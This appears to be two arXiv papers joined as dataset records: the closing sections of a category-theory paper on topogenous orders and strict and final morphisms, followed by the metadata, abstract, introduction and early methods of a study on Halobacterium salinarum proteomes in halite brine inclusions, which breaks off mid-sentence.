on \(F\). It is ordered by \(I\leq I^{\prime}\) if \(I_{X}(A)\leq I^{\prime}_{X}(A)\) for all \(A\in\ F^{-1}X\) and \(X\in\mathcal{C}\). An interior operator \(I\) on \(F\) is idempotent if \(I\circ I=I\), that is \(I_{X}(I_{X}(A))=I_{X}(A)\) for all \(A\in\ F^{-1}X\) and \(X\in\mathcal{C}\). A reasonning similar to the one in Proposition 3.2 results in the following proposition. **Proposition 3.3**.: _Let \(F\) be a form such that each of its fibres is a complete lattice. For a topogenous order \(\sqsubset\) on \(F\) satisfying condition \((TJ)\) and an interior operator \(I\) on \(F\), the assignments_ \[I\longmapsto\sqsubset^{I}\ \ \text{and}\ \ \sqsubset\longmapsto I^{\sqsubset}\] _where \(A\sqsubset^{I}_{X}B\Leftrightarrow A\leq_{X}I_{X}(A)\) and \(I^{\sqsubset}(B)=\bigvee\{A\in F^{-1}X\ |\ A\sqsubset_{X}B\}\) for any \(X\in\mathcal{C}\)and \(A,B\in F^{-1}X\) define order isomorphisms inverse to each other between ITORD(\(F\)) and Int(\(F\)). \(I^{\sqsubset}\) is idempotent if and only if \(\sqsubset\) is interpolative._ ## 4 Strict and final morphisms **Proposition 4.1**.: _Let \(f:X\longrightarrow Y\) be a \(\mathcal{C}\)-morphism and \(\sqsubset\in TORD(F).\) Then \((T3)\) in Definition 2.1 is equivalent to \(A\sqsubset_{Y}B\Rightarrow A.\)\(f\sqsubset_{X}B.\)\(f\) for all \(A,B\in F^{-1}Y\)._ Looking at axiom \((T3)\) in Definition 3.1 and Proposition 3.3, one would ask the question which morphisms satisfy the converse implication. We study in this section \(\mathcal{C}\)-morphisms that preserve topogenous orders \(\sqsubset\) on \(F\) as well as those that reflect them. **Definition 4.1**.: Let \(\sqsubset\) be a topogenous order on \(F\). A morphism \(f:X\longrightarrow Y\) in \(\mathcal{C}\) is said to be \(\sqsubset\)-_strict_ if \(A\sqsubset_{X}B.\)\(f\Rightarrow f.\)\(A\sqsubset_{Y}B\) for all \(A\in F^{-1}X\) and \(B\in F^{-1}Y\). Similarly, \(f\) is \(\sqsubset\)-_final_ if \(B.\)\(f\sqsubset_{X}B^{\prime}.\)\(f\Rightarrow B\sqsubset_{Y}B^{\prime}\) for all \(B^{\prime},B\in F^{-1}Y\). **Theorem 4.2**.: _Let \(\sqsubset\) be a topogenous order on \(F\). A morphism \(f:X\longrightarrow Y\) is \(\sqsubset\)-stict if and only if \(\sqsubset\) preserves the codomains of cocartesian liftings of \(f\), i.e. \(A\sqsubset_{X}B\Rightarrow f.\)\(A\sqsubset_{X}f.\)\(B\) for \(A,B\in F^{-1}X\)._ Proof.: Assume that \(f\) is \(\sqsubset\)-strict and \(A\sqsubset_{X}B\). Since cartesian and cocartesian liftings of \(f\) exist, \((f.\ B).\)\(f\) exists and \(A\sqsubset_{X}B\leq(f.\ B).\)\(f\Rightarrow A\sqsubset_{X}(f.\ B).\)\(f\Rightarrow f.\)\(A\sqsubset_{X}f.\ B.\) Conversely, if \(\sqsubset\) preserves codomains of cocartesian liftings of \(f\) and \(A\sqsubset_{X}B.\)\(f\), then \(f.\)\((B.\ f)\) exists and \(A\sqsubset_{X}B.\)\(f\Rightarrow f.\)\(A\sqsubset_{X}f.\)\((B.\ f)\leq B\Rightarrow f.\)\(A\sqsubset_{X}B.\) Let us recall from [16] the notion of a thick morphism which will help us to characterize \(\sqsubset\)-final morphisms. In a bounded form \(F\) over \(\mathcal{C}\), \(f:X\longrightarrow Y\in\mathcal{C}\) is a _thick morphism_ if \(f.\)\(1^{X}=1^{Y}\). **Theorem 4.3**.: _Let \(F\) be a locally bounded form and \(\sqsubset\in\)TORD(\(F\)). Then, every \(\sqsubset\)-final morphism \(f:X\longrightarrow Y\) is thick provided \(1^{Y}\sqsubset 1^{Y}.\) The condition \(1^{Y}\sqsubset 1^{Y}\) can be dropped if \(\sqsubset\in\)MTORD(\(F\)). If \(F\) reflects retractions, then every retraction which is \(\sqsubset\)-final is \(\sqsubset\)-strict while if \(F\) reflects sections, every section that is \(\sqsubset\)-strict is \(\sqsubset\)-final._ Proof.: Since \(1^{Y}\sqsubset 1^{Y}\) and \(f\) is \(\sqsubset\)-final, \(1^{Y}\sqsubset 1^{Y}\Rightarrow 1^{Y}.\)\(f\sqsubset 1^{Y}.\)\(f\Rightarrow 1^{Y}.\)\(f\sqsubset 1^{X}\leq(f.\)\(1^{X}).\)\(f\Rightarrow 1^{Y}.\)\(f\Rightarrow 1^{Y}\sqsubset f.\)\(1^{X}\Rightarrow 1^{Y}\leq f.\)\(1^{X}=1^{Y}\). It is clear that if \(\sqsubset\in\)MTORD(\(F\)), then \(1^{Y}\sqsubset 1^{Y}\) can be dropped because \(1^{Y}\sqsubset 1^{Y}\Leftrightarrow C^{\sqsubset}(1^{Y})=1^{Y}\). Assume \(F\) reflects retractions and \(f\) is a retraction that is \(\sqsubset\)-final. Then, by Lemma 3.1, \(A\sqsubset_{X}B\Leftrightarrow(f.\ A).\)\(f\sqsubset(f.\ B).\)\(f\Leftrightarrow f.\)\(A\sqsubset f.\)\(B\). Lastly, let \(F\) reflect sections and \(f\) be a section which is \(\sqsubset\)-strict. Then, by Lemma 3.1, \(B.\)\(f\sqsubset_{X}B^{\prime}.\)\(f\Rightarrow f.\)\((A.\ f)\sqsubset f.\)\((B.\ f)\Rightarrow A\sqsubset B.\) **Proposition 4.4**.: _Let \(\sqsubset\) be a topogenous order on \(F\). If \(F\) reflects isomorphisms, then the class of \(\sqsubset\)-strict (resp. \(\sqsubset\)-final) morphisms contains all isomorphisms of \(\mathcal{C}\). The class of \(\sqsubset\)-strict (resp. \(\sqsubset\)-final) morphisms is closed under composition. If \(F\) reflects retractions, \(g\circ f\) is a \(\sqsubset\)-strict (resp. \(\sqsubset\)-final) morphism, and \(f\) is a retraction, then \(g\) is \(\sqsubset\)-strict (resp. \(\sqsubset\)-final) morphism. Dually, if \(F\) reflects sections, \(g\circ f\) is a \(\sqsubset\)-strict (resp. \(\sqsubset\)-final) morphism, and \(g\) is a retraction, \(f\) is \(\sqsubset\)-strict (resp. \(\sqsubset\)-final)._ Proof.: Assume that \(f\) is an isomorphism with inverse \(g\). Since \(F\) reflects isomorphisms, by Lemmas 3.1 and 2.1, we have that \(A\sqsubset B.\)\(f\Rightarrow f.\)\(A=A.\)\(g\sqsubset(B.\)\(f).\)\(g=B.\)\((g\circ f)=B.\)\(1_{X}=B\) for any \(A\in\ F^{-1}X\) and \(B\in\ F^{-1}Y\). If \(f:X\longrightarrow Y\) and \(g:Y\longrightarrow Z\) are \(\sqsubset\)-strict, then by Lemma 2.1, \(A\sqsubset B.\)\((f\circ g)=(B.\)\(f).\)\(g\Leftrightarrow f.\)\(A\sqsubset B.\)\(g\Leftrightarrow(g\circ f).\)\(A=g.\)\((f.\)\(A)\sqsubset B.\) Let \(f\) be a retraction and \(g\circ f\)\(\sqsubset\)-strict. Since \(F\) reflects retractions, By Lemmas 3.1 and 2.1, \(A\sqsubset B.\)\(g\Rightarrow A.\)\(f\sqsubset(B.\)\(g).\)\(f=B.\)\((g\circ f)\Rightarrow(g\circ f).(A.\)\(f)\sqsubset B\Leftrightarrow g.\)\([f.\)\((A.\)\(f)]\sqsubset B\Leftrightarrow g.\)\(A\sqsubset B.\) Let \(f\) be a section and \(g\circ f\)\(\sqsubset\)-strict. Since \(F\) reflects sections, by Lemmas 3.1 and 2.1, \(A\sqsubset B.\)\(f=[(g.\)\(A).\)\(g].\)\(f=(g.\)\(B).\)\((g\circ f)\Rightarrow g.\)\((f.\)\(A)\sqsubset g.\)\(B\Rightarrow f.\)\(A\sqsubset(g.\)\(B).\)\(g\Rightarrow f.\)\(A\sqsubset B\). A similar resonning can be applied for the case of \(\sqsubset\)-final. Taking into consideration Propositions 3.3 and 3.2 and the fact that for any morphism \(f:X\longrightarrow Y\) in \(\mathcal{C}\) cocartesian (resp. cartesian) liftings of \(f\) at any \(A\in F^{-1}X\) (resp. \(B\in F^{-1}Y\)) exist, we obtain the following result. **Proposition 4.5**.: _Let \(\sqsubset\) be a topogenous order on \(F\), \(f:X\longrightarrow Y\) a \(\mathcal{C}\)-morphism and assume that \(\sqsubset\)\(\in\)JTORD(\(F\)). Then \(f\) is \(\sqsubset\)-stict if \(I^{\sqsubset}\) preserves domains of cartesian liftings of \(f\), i.e. \(I^{\sqsubset}(B).\)\(f=I^{\sqsubset}_{X}(B.\)\(f)\) for any \(B\in F^{-1}Y\). Similarly, if \(\sqsubset\)\(\in\)MTORD(\(F\)), then \(f\) is \(\sqsubset\)-strict if and only if \(C^{\sqsubset}\) preserves codomains of cocartesian liftings of \(f\), i.e. \(f.\)\(C^{\sqsubset}_{X}(A)=C^{\sqsubset}_{X}(f.\)\(A)\) for any \(A\in F^{-1}X\)._ Let \(\mathcal{C}\) be finitely cocomplete (so that pushouts of \(\mathcal{E}\)-morphisms along arbirary \(\mathcal{C}\)-morphisms exist and are in \(\mathcal{E}\)) with a proper \((\mathcal{E},\mathcal{M})\)-factorization structure for morphisms. Let \(F\) be the domain functor \(dom:\mathcal{E}\longrightarrow\mathcal{C}\). For any \(X\in\mathcal{C}\), \(F^{-1}X\) is the preordered class of \(\mathcal{E}\)-quotients of \(X\). For any \(\mathcal{C}\)-morphism \(f:X\longrightarrow Y\) and \(e\in F^{-1}X\), \(f.\)\(e\) is the pushout of \(e\) along \(f\) while \(d.\)\(f\) is the \(\mathcal{E}\)-part of the \((\mathcal{E},\mathcal{M})\)-factorization of \(d\circ f\) for any \(d\in F^{-1}Y\). **Definition 4.2**.: A topogenous order \(\sqsubset\) on \(F\) is said to be _cohereditary_ if for any retraction \(f:X\longrightarrow Y\) and any \(A,B\in F^{-1}Y\), \(B.\)\(f\sqsubset_{X}A.\)\(f\Rightarrow B\sqsubset_{Y}A\). Equivalently, \(\sqsubset\) is said to be _cohereditary_ if every retraction is \(\sqsubset\)-final. When \(\sqsubset\in\)JTORD\((F)\), \(\sqsubset\) is cohereditary if and only if \(C^{\sqsubset}_{Y}(B)=f.\)\(C^{\sqsubset}_{X}(B.\)\(f)\) for any retraction in \(\mathcal{C}\). It was observed in [6] that there is an order reversing isomorphism between the poset of full \(\mathcal{E}\)-reflective replete subcategories of \(\mathcal{C}\) and the poset of cohereditary idempotent closure operators on the form of \(\mathcal{E}\)-quotient. This result together with Proposition 3.2 permit to affirm that _there is an order reversing isomorphism between the poset of full \(\mathcal{E}\)-reflective replete subcategories of \(\mathcal{C}\) and the conglomerate of all cohereditary and interpolative topogenous orders on the form of \(\mathcal{E}\)-quotients in \(\mathcal{C}\) satisfying condition (TM)_. ## 5 Some examples **I**. Let \(F\) be the forgetful functor from **Top** to **Set**. For every \(X\in\textbf{Set}\), \(F^{-1}X\) is the complete lattice of all topologies on \(X\). If \(f:X\longrightarrow Y\) is a function in **Set**, \(f.\)\(\mathcal{T}_{X}\) is the final topology on \(Y\) induced by \(f\) for all \(\mathcal{T}_{X}\in F^{-1}X,\) and \(\mathcal{T}_{Y}.\)\(f\) is the initial topology on \(X\) induced by \(f\) for all \(\mathcal{T}_{Y}\in F^{-1}Y\). \(F\) is a bounded form in which \(\mathcal{T}_{Y}.\)\(f\) and \(f.\)\(\mathcal{T}_{X}\) exist for any \(\mathcal{T}_{X}\in F^{-1}X\) and \(\mathcal{T}_{Y}\in F^{-1}Y\). Let \(\mathcal{T}_{X},\mathcal{T^{\prime}}_{X}\in F^{-1}X.\) \((a)\) Putting \(\mathcal{T}_{X}\sqsubset_{X}\mathcal{T^{\prime}}_{X}\Leftrightarrow\theta( \mathcal{T}_{X})\leq_{X}\mathcal{T^{\prime}}_{X},\) where \(\theta(\mathcal{T}_{X})\) is the \(\theta\)-topology generated by \(\mathcal{T}_{X}\), we get a topogenous order on \(F\). \((T1)\) and \((T2)\) follow from the fact that \(\theta(\mathcal{T}_{X})\leq_{X}\mathcal{T^{\prime}}_{X}\Leftrightarrow\mathcal{ T^{\prime}}_{X}\subseteq\theta(\mathcal{T}_{X})\). For \((T3)\), let \(f:X\longrightarrow Y\) and \(\mathcal{T}_{Y},\mathcal{T^{\prime}}_{Y}\in F^{-1}Y\). Assume that \(\mathcal{T^{\prime}}_{Y}\subseteq\theta(\mathcal{T}_{Y})\) and \(A\in\mathcal{T^{\prime}}_{Y}\). \(f\). Then there is \(O^{\prime}\in\mathcal{T^{\prime}}_{Y}\) such that \(A=f^{-1}(O^{\prime})\) and \(O^{\prime}\in\theta(\mathcal{T}_{Y})\) by the assumption. Let \(y\in A\). Then \(f(y)\in O\) and so there is \(U\in\mathcal{U}_{f(y)}\) with \(U\) closed and \(U\subseteq O\). This implies that \(f^{-1}(U)\subseteq f^{-1}(O)=A\) and \(f^{-1}(U)\in\mathcal{U}_{Y}\). Consequently \(A\in\theta(\mathcal{T}_{Y}.\)\(f)\), i.e. \(\mathcal{T^{\prime}}_{Y}.\)\(f\subseteq\theta(\mathcal{T}_{Y}.\)\(f)\). It is easy to see that \(\sqsubset\in MTORD(F)\). **Proposition 5.1**.: _A function \(f:X\longrightarrow Y\) is \(\sqsubset\)-strict if it is surjective and for any \(\mathcal{T}_{X}\in F^{-1}X\) and \(\mathcal{T}_{Y}\in F^{-1}Y\), \(f:(X,\mathcal{T}_{X})\longrightarrow(Y,\mathcal{T}_{Y})\) is clopen. Every surjective function \(f:X\longrightarrow Y\) is \(\sqsubset\)- final._ Proof.: Assume \(\mathcal{T}_{Y}.\)\(f\subseteq\theta(\mathcal{T}_{X})\) and \(A\in\mathcal{T}_{Y}\). If \(y\in A\), then by surjectivity of \(f\), there is \(x\in f^{-1}(A)\) such that \(f(x)=y\) and \(f^{-1}(A)\in\mathcal{T}_{Y}.\)\(f\). By assumption, there are \(O\in\mathcal{T}_{X}\) and \(U\) closed in \(\mathcal{T}_{X}\) such that \(x\in O\subseteq U\subseteq f^{-1}(A)\). Since \(f\) is clopen, \(f(O)\in\mathcal{T}_{Y}\) and \(f(U)\) is closed in \(\mathcal{T}_{Y}\). We have \(f(x)=y\in f(O)\subseteq f(U)\in A\). Thus \(A\in\theta(f.\)\(\mathcal{T}_{X})\), that is \(\mathcal{T}_{Y}\subseteq\theta(f.\)\(\mathcal{T}_{X})\). Consequently \(f\) is \(\sqsubset\)-strict. Assume that \(\mathcal{T^{\prime}}_{Y}.\)\(f\subseteq\theta(\mathcal{T}_{Y}.\)\(f)\) and \(A\in\mathcal{T^{\prime}}_{Y}.\) Let \(x\in A\). Since \(f\) is surjective, there is \(x\in f^{-1}(A)\) such that \(y=f(x)\) and \(f^{-1}(A)\in\mathcal{T^{\prime}}_{Y}.\)\(f\). By the assumption, \(f^{-1}(A)\in\theta(\mathcal{T}_{Y}.\)\(f)\) and so there are open \(O\in\mathcal{T}_{Y}.\)\(f\) and closed \(U\) in \(\mathcal{T}_{Y}.\)\(f\) such that \(x\in O\subseteq U\subseteq f^{-1}(A)\). Now, \(O=f^{-1}(O^{\prime})\) and \(U=f^{-1}(U^{\prime})\) with \(O^{\prime}\in\mathcal{T}_{Y}\) and \(U^{\prime}\) closed in \(\mathcal{T}_{Y}\). We get that \(f(x)\in O^{\prime}\subseteq U^{\prime}\subseteq A\). Thus \(A\in\theta(\mathcal{T}_{Y})\) and \(\mathcal{T^{\prime}}_{Y}\subseteq\theta(\mathcal{T}_{Y})\). \((b)\) Putting \({\cal T}_{X}\sqsubset_{X}{\cal T}^{\prime}{}_{X}\Leftrightarrow{\cal T}_{X} \leq_{X}b({\cal T}^{\prime}{}_{X})\), where \(b({\cal T}^{\prime}{}_{X})\) is the \(b\)-topology generated by \({\cal T}^{\prime}{}_{X}\), is a topogenous order on \(F\). \((T1)\) and \((T2)\) follow from the fact that \({\cal T}_{X})\leq_{X}b({\cal T}^{\prime}{}_{X})\Leftrightarrow b({\cal T}^{ \prime}{}_{X})\subseteq{\cal T}_{X}\). For \((T3)\), let \(f:X\longrightarrow Y\in{\bf Set}\) and \({\cal T}_{X}\in F^{-1}X\), \({\cal T}_{Y}\in F^{-1}Y\). Assume that \(b({\cal T}_{Y})\subseteq f.\)\({\cal T}_{X}\) and \(A\in{\cal T}_{Y}.\)\(f.\) Then, there is \(O\in{\cal T}_{Y}\) such that \(A=f^{-1}(O)\). Since \({\cal T}_{Y}\subseteq b({\cal T}_{Y})\), \(O\in b({\cal T}_{Y})\) and by the assumption, \(O\in f.\)\({\cal T}_{X}\) which implies that \(A\in{\cal T}_{X}\) and \(A\in b({\cal T}_{X})\). Thus \({\cal T}_{Y}.\)\(f\subseteq b({\cal T}_{X})\). Clearly, \(\sqsubset\in JTORD(F).\) **Proposition 5.2**.: _Every function \(f:X\longrightarrow Y\) is \(\sqsubset\) strict (resp. \(\sqsubset\)-final)._ Proof.: Assume that \(b({\cal T}^{\prime}{}_{X})\subseteq{\cal T}_{X}\) and \(A\in b(f.{\cal T}^{\prime}{}_{X})\). If \(x\in f^{-1}(A)\), then \(f(x)\in A\) and there are \(O\in f.\)\({\cal T}^{\prime}{}_{X}\) and \(F\in f.\)\({\cal T}_{X}\) such that \(f(x)\in O\cap F\subseteq A.\) Now, \(f^{-1}(O)\in{\cal T}^{\prime}{}_{X}\) and \(f^{-1}(F)\) is closed in \({\cal T}^{\prime}{}_{X}\). We have that \(x\in f^{-1}(O\cap F)=f^{-1}(O)\cap f^{-1}(F))\subseteq f^{-1}(A)\). Since \(f^{-1}(O)\in{\cal T}^{\prime}{}_{X}\) and \(f^{-1}(F)\) is closed in \({\cal T}^{\prime}{}_{X}\), \(f^{-1}(A)\in b({\cal T}^{\prime}{}_{X})\) which implies that \(f^{-1}(A)\in{\cal T}_{X}\). Thus \(A\in b(f.{\cal T}_{X})\). Assume \(b({\cal T}^{\prime}{}_{Y}.\)\(f)\subseteq{\cal T}_{Y}.\)\(f\) for any \({\cal T}_{Y},{\cal T}^{\prime}{}_{Y}\in F^{-1}Y\) and \(A\in b({\cal T}^{\prime}{}_{Y})\). Let \(x\in f^{-1}(A)\). Then \(f(x)\in A\) and there are \(O\in{\cal T}^{\prime}{}_{Y}\) and \(F\) closed in \({\cal T}^{\prime}{}_{Y}\) such that \(f(x)\in O\cap F\subseteq A\). This implies that \(x\in f^{-1}(O)\cap f^{-1}(F)\subseteq f^{-1}(A)\). Thus \(f^{-1}(A)\in b({\cal T}^{\prime}{}_{Y}.\)\(f)\subseteq{\cal T}_{Y}.\)\(f\). **II**. Another example, somehow similar to the previous one, is the concrete functor \(F\) from **Qunif** to **Top** (where **Top** denotes the category of topological spaces and continuous maps and **Qunif**) denotes the category of quasi-uniform spaces and quasi-uniformly continuous maps. Then, for any \(X\in{\bf Top}\), \(F^{-1}X\) is the complete lattice of all quasi-uniform structures on \(X\) compatible with \({\cal T}\), known as _functorial quasi-uniform structures_. If \(f:X\longrightarrow Y\) is a continuous map and \({\cal U}_{Y}\in F^{-1}Y\), then \({\cal U}_{Y}.\)\(f\) is initial quasi-uniformity induced by \(f\) and \(f.\)\({\cal U}_{X}\) is the largest quasi-uniformity on \(Y\) for which \(f\) is quasi-uniformly continuous. For any \({\cal U}_{X},{\cal V}_{X}\in F^{-1}X\), putting \({\cal U}_{X}\sqsubset_{X}{\cal V}_{X}\Leftrightarrow{\cal U}_{X}\leq_{X}{\cal V }_{X}^{\star}\), where \({\cal V}_{X}^{\star}\) is the coarsest uniformity containing \({\cal V}_{X}\), we get a topogenous order on \(F\). **III**. Let \(F\) the form of subgroups (i.e injective group homomorphisms) with **Grp** the category of groups and group homomorphisms. Then, for any \(X\in{\bf Grp}\), \(F^{-1}X\) is the complete lattice of all subgroups of \(X\). It is also clear that this form is bounded and \(A.\)\(f\) and \(f.\)\(B\) exist for any \(A\in F^{-1}X\) and \(B\in F^{-1}Y.\) Now, define \(\sqsubset\) on \(F\) by \(A\sqsubset B\Leftrightarrow A\leq N\leq B\) with \(N\) a normal subgroup of \(X\). Then \(\sqsubset\) is a topogenous order on \(F\). A group homomorphism \(f:X\longrightarrow Y\) is \(\sqsubset\)-strict if and only if it preserves normal subgroups while \(f\) is \(\sqsubset\)-final if and only if it is surjective.
2305.11904
Molecular acclimation of Halobacterium salinarum to halite brine inclusions
Halophilic microorganisms have long been known to survive within the brine inclusions of salt crystals, as evidenced by the change in color for salt crystals containing pigmented halophiles. However, the molecular mechanisms allowing this survival has remained an open question for decades. While protocols for the surface sterilization of halite (NaCl) have enabled isolation of cells and DNA from within halite brine inclusions, "-omics" based approaches have faced two main technical challenges: (1) removal of all contaminating organic biomolecules (including proteins) from halite surfaces, and (2) performing selective biomolecule extractions directly from cells contained within halite brine inclusions with sufficient speed to avoid modifications in gene expression during extraction. In this study, we tested different methods to resolve these two technical challenges. Following this method development, we then applied the optimized methods to perform the first examination of the early acclimation of a model haloarchaeon (Halobacterium salinarum NRC-1) to halite brine inclusions. Examinations of the proteome of Halobacterium cells two months post-evaporation revealed a high degree of similarity with stationary phase liquid cultures, but with a sharp down-regulation of ribosomal proteins. While proteins for central metabolism were part of the shared proteome between liquid cultures and halite brine inclusions, proteins involved in cell mobility (archaellum, gas vesicles) were either absent or less abundant in halite samples. Proteins unique to cells within brine inclusions included transporters, suggesting modified interactions between cells and the surrounding brine inclusion microenvironment. The methods and hypotheses presented here enable future studies of the survival of halophiles in both culture model and natural halite systems.
C. Favreau, A. Tribondeau, M. Marugan, F. Guyot, B. Alpha-Bazin, A. Marie, R. Puppo, T. Dufour, A. Huguet, S. Zirah, A. Kish
2023-05-16T21:49:51Z
http://arxiv.org/abs/2305.11904v1
# Molecular acclimation of Halobacterium salinarum to halite brine inclusions ###### Abstract Halophilic microorganisms have long been known to survive within the brine inclusions of salt crystals, as evidenced by the change in color for salt crystals containing pigmented halophiles. However, the molecular mechanisms allowing this survival has remained an open question for decades. While protocols for the surface sterilization of halite (NaCl) have enabled isolation of cells and DNA from within halite brine inclusions, "-omics" based approaches have faced two main technical challenges: (1) removal of all contaminating organic biomolecules (including proteins) from halite surfaces, and (2) performing selective biomolecule extractions directly from cells contained within halite brine inclusions with sufficient speed to avoid modifications in gene expression during extraction. In this study, we tested different methods to resolve these two technical challenges. Following this method development, we then applied the optimized methods to perform the first examination of the early acclimation of a model haloarchaeon (Halobacterium salinarum NRC-1) to halite brine inclusions. Examinations of the proteome of Halobacterium cells two months post-evaporation revealed a high degree of similarity with stationary phase liquid cultures, but with a sharp down-regulation of ribosomal proteins. While proteins for central metabolism were part of the shared proteome between liquid cultures and halite brine inclusions, proteins involved in cell mobility (archaeulum, gas vesicles) were either absent or less abundant in halite samples. Proteins unique to cells within brine inclusions included transporters, suggesting modified interactions between cells and the surrounding brine inclusion microenvironment. The methods and hypotheses presented here enable future studies of the survival of halophiles in both culture model and natural halite systems. Keywords:Halobacterium, halophile, LC-MS, proteomics, halite (NaCl) + Footnote †: journal: _The document is an author-edited version of the original article while presenting identical scientific content_ ## 1 Introduction Extremely halophilic archaea are adapted to the highest possible salinity conditions, thriving in saturated brines. Microbial diversity in such environments is highly reduced and tends to be dominated by haloarchae (Oren, 2006). Saturated brines are characterized by a low dissolved oxygen content at the surface despite their contact with air (Sherwood et al., 1991). The surface of saturated brines is often exposed to high temperatures and high levels of solar radiation (Oren, 2006; Merino et al., 2019), which can lead to evaporation. During evaporation events, the total contents of the brine, including salts, organics, some atmospheric gases, and any microorganisms present, are trapped within inclusions in the salt crystals. Viable halophilic bacteria and archaea have been isolated from halite (NaCl) of various ages, from months to years (Norton and Grant, 1988; Gramain et al., 2011; Huby et al., 2020), to geologically relevant timescales with the age of the primary halite given by the surrounding geological matrix. Some studies have even reported the observation or isolation of microorganisms from halite dated to several hundreds of millions of years (Vreeland et al., 2000; Schreder-Gomes et al., 2022). These observations have raised two important questions: (1) are these truly "ancient" cells? (2) what physiological changes are required for microbial cells to remain viable within halite brine inclusions? The first question has been studied in greater detail, and while many questions still remain, these studies provided valuable insights into the potential for surface-contaminant microorganisms (Graur and Pupko, 2001; Maughan et al., 2002; Nickie et al., 2002). In response to these criticisms, appropriate surface sterilization and cleaning procedures for microbial cultivation and DNA isolation for micro-biodiversity studies from dissolved ancient halite (Gramain et al., 2011; Sankaranarayanan et al., 2011) were developed. These approaches enabled more accurate identification of only those microorganisms trapped within halte inclusions. Another opened question is whether the age determined from the geological context in which primary halite crystals were found can accurately be applied directly to the microorganisms in the brine inclusions (Hazen and Roedder, 2001). Dissolution and recrystallization of halite over geological time scales may contribute to the presence of more modern microorganisms (see discussion in Winters et al., 2015 and references therein). No known microbial survival mechanism to date can account for cell viability over millions of years. Some studies have examined the possibility that microbial cell-like biomorphs are preserved within brine inclusions (Nims et al., 2021). An alternative approach is to experimentally confirm how microbial life is supported within brine inclusions over durations known to support viable microorganisms. Determining the cellular functions expressed by viable halophiles within halite brine inclusions requires the direct isolation of biomolecules such as proteins and nucleic acids for "-omics" analyses, including proteomics and transcriptomics. However, significant technical challenges are presented by the closed system of brine inclusions within halite. Accessing the contents of brine inclusions by rapid crystal dissolution leads to cell lysis by osmotic shock and biomolecule degradation, while the time required for gradual crystal dissolution preserving cellular integrity is also sufficient for alterations in the transcriptomes and proteomes of viable cells away from their state within the brine inclusions. In addition, the direct extraction of biomolecules from brine inclusions involves a large amount of NaCl, which is incompatible with direct mass spectrometry analysis due to the lack of sufficient desalination steps in standard protocols. Although current hypotheses concerning the modifications of halophile physiology during entrapment within halite brine inclusions include a change to anaerobic metabolism (Winters et al., 2015) along with potential for cell envelope modifications depending on conditions (Fendrthan et al., 2012; Krumuller and Greie, 2012), these remain largely unverified at the molecular level due to these experimental challenges. New methods are needed to isolate proteins and other biomolecules directly from halite brine inclusions, without allowing the microorganisms to alter their gene expression during salt dissolution and processing. The development of a new analytical workflow compatible with "-omics" analyses is best conducted with a known model organism for which there is a large repertoire of physiological studies and multi-omics data for liquid cultures exposed to a range of conditions applicable to halite brine inclusions (different oxygen availabilities, salinities, nutrient availabilities, etc.). For these reasons, we choose the model haloarchaeon _Halobacterium solinaorum_, the type strain of the Halobacteriales family (Gruber et al., 2004; Oren et al., 2009). _Halobacterium solinaorum_ is an appropriate model as it is found both in contemporary NaCl-saturated aqueous environments such as Great Salt Lake (Post, 1977) and has been detected in halite and closely related to isolates from ancient salt deposit (Mormile et al., 2003) The red pigmentation of _H. solinaorum_ strain is directly correlated with transmembrane proteins (bacteriorhodopsin and halorhodopsin) and carotenoids (bacterioruberin) also used by cells as antioxidants (Eichler, 2019). The accumulation of high intracellular concentrations of potassium (K') and chloride (CI') (Engel and Catchpole, 2005), needed to maintain osmotic homeostasis, induces both biochemical adaptations (in the form of a strongly acidic proteome) as well as technical challenges to desalt cellular extracts. _Halobacterium solinaorum_ survives in changing environments by using a complex variable energetic metabolism with a preference for aerobic respiration but is capable of switching to phototrophy via bacteriorhodopsin, arginine fermentation or anaerobic respiration using dimethyl sulfoxide (DMSO) and trimethylamine oxide (TMAO) if available (Hartmann et al., 1980; Muller and DasSarma, 2005; Falb et al., 2008; Gonzalez et al., 2009). This type of switch occurs under low oxygen conditions such as during increasing salinity linked to water evaporation. Moreover, according to Orellana et al. (2013), _H. solinaorum_ also seems to be able to use glycerol derived from microalgae of the genus _Dunaliello_ as a source of carbon under certain specific conditions (in liquid co-culture condition with viable _Dunaliello_ with high illumination over a set diurnal cycle and nitrate-limiting conditions). Established multi-omics protocols for liquid cultures of _H. solinaorum_ have permitted analyses of the cellular responses to a broad range of environmental conditions, including variations in NaCl (Leuko et al., 2009), pH (Moran-Reyna and Coker, 2014), oxygen (Schmdl et al., 2007), and temperature (Coker et al., 2007), all relevant to halite brine inclusions. This existing knowledge base far exceeds that developed to date for halophiles isolated directly from ancient halite. Here we present an efficient new analytical method for the study of microorganisms within halite, validated using _H. solinaorum_ entrapped in laboratory-grown halite to probe the question of what physiological changes are required for microbial cells to remain viable within halite brine inclusions, focusing on the initial phase of halite entrapment. The developed workflow includes removal of not only surface-attached cells and nucleic acids but also proteins, with subsequent extraction and desalting of proteins directly from brine inclusions compatible with mass spectrometry analyses. Applying these methods, we determined the acclimation of _H. solinaorum_ cells to inclusions at molecular level within laboratory-grown halite by analyzing the differences in the expressed proteome prior to evaporation and 2 months after culture evaporation. Analyses focused on the characterization of cellular activity compared to stationary cells not trapped within halite, as well as the interactions of cells with halite brine inclusion environment. ## 2 Materials and methods All reagents used were analytical grade and suitable for molecular biology. ### Strain and culture conditions _Halobacterium solinaorum_ strain NRC-1 (JCM 11081) was grown under oxic conditions in autoclaved complex medium (CM: 4.28 M NaCl, 81 mM MgSO,7H2O, 27 mM KCl, 10 mM trisodium-citrate_2H2O, 1% (w/w) peptone Oxoid* LP0034, pH adjusted to 7.4) following Oesterhelt and Stoeckenius (1974) at 37\({}^{\circ}\)C, 180 rpm in glassware washed and then rinsed multiple times in MilliQ* water with vigorous shaking to remove all traces of detergents that can inhibit the growth of haloarchae. Growth was monitored by spectrophotometry at 600 nm (OD\({}_{1000}\)). Cultures for crystallizations and protein extractions were grown to stationary phase (OD\({}_{200}\) = 1.0-1.6) avoiding decline phase to approximate the physiological condition of haloarchae under natural conditions during evaporation. ### Laboratory-grown halte #### 2.2.1 Internally inoculated halte Modeling entrapment of haloarchae within halte was already done in laboratory by Norton and Grant (1988), Gramain et al. (2011) and Krumoller and Griee (2012). In this study, laboratory-grown halte crystals were produced following a modified version of protocols of Fendrihan et al. (2012), by adding nutrients to their Tris-buffered NaCl solution (TN buffer; 100 mM Tris-HCl pH 7.4, 4.28 M NaCl) to simulate organic matter and nutrients in the natural environment just prior to halte precipitation (Winters et al., 2015). Briefly, _H. Salinarum_ cells in stationary growth phase were harvested by centrifugation at 7,500g, 10 min, 20\({}^{\circ}\)C and the growth medium removed by washing with sterile TN buffer. Cells were then resuspended in sterile TNPA buffer (TN buffer with 1% (w/v) 